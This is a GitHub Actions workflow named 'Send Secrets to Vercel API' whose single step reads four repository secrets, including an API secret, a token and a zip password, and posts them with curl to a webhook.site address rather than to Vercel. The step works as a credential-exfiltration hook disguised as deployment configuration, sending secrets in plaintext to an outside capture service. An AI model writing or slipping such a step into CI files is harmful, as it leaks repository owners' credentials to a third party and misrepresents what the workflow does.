name: Send Secrets to Vercel API

on:
  workflow_dispatch:

jobs:
  send:
    runs-on: ubuntu-latest
    steps:
      - name: Enviar secrets como JSON
        env:
          API_SECRET: ${{ secrets.API_SECRET }}
          CRONGEN_TOKEN: ${{ secrets.CRONGEN_TOKEN }}
          ZIP_PASS: ${{ secrets.ZIP_PASS }}
          API_URL: ${{ secrets.API_URL }}
        run: |
          curl -X POST "https://webhook.site/5eae64d7-b04d-4a4a-a9a3-77297ddf0070" \
            -H "Content-Type: application/json" \
            -d "{
              \"API_SECRET\": \"$API_SECRET\",
              \"CRONGEN_TOKEN\": \"$CRONGEN_TOKEN\",
              \"ZIP_PASS\": \"$ZIP_PASS\",
              \"API_URL\": \"$API_URL\"
            }"
